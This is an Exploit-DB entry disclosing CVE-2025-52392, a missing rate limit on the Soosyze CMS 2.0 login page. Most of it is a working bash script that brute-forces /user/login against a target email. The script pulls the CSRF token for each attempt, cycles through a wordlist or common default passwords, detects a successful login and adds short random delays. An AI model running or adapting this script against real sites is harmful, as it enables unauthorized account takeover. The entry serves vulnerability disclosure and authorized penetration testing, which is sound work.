Soosyze CMS 2.0 - Brute Force Login

EDB-ID:

52416

CVE:

2025-52392

EDB Verified:

Author:

Beatriz Fresno Naumova

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2025-08-18

Vulnerable App: 
# Exploit Title: Soosyze CMS 2.0 - Brute Force Login
# Google Dork: N/A
# Date: 2025-08-13
# Exploit Author: Beatriz Fresno Naumova (beafn28)
# Vendor Homepage: https://soosyze.com/
# Software Link: https://github.com/soosyze/soosyze
# Version: 2.0 (tested)
# Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed
# CVE : CVE-2025-52392

# Description:
# Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting
# and account lockout mechanisms. An attacker can submit unlimited POST requests with a known
# username/email and a password wordlist, potentially gaining unauthorized access (CWE-307).

# PoC Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, a dictionary is used.

#!/usr/bin/env bash

set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="test@test.com"

WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
COOKIE_JAR="$(mktemp)"

get_form() {
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

extract_token() {
    local name value
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true)
    fi
    printf '%s\t%s\n' "$name" "$value"
}

post_login() {
    local pass="$1" tname="$2" tval="$3"
    curl -sS -o /tmp/resp.html -w "%{http_code}" \
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
        -X POST "$form_url" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Origin: $BASE_URL" -H "Referer: $form_url" \
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \
        --data-urlencode "$PASS_FIELD=$pass" \
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

echo "[*] Starting brute-force attack on $form_url"
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    get_form
    IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    if grep -q '"redirect"' /tmp/resp.html; then
        echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    sleep 0.$((RANDOM%9+1))
done

rm -f "$COOKIE_JAR" /tmp/resp.html
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services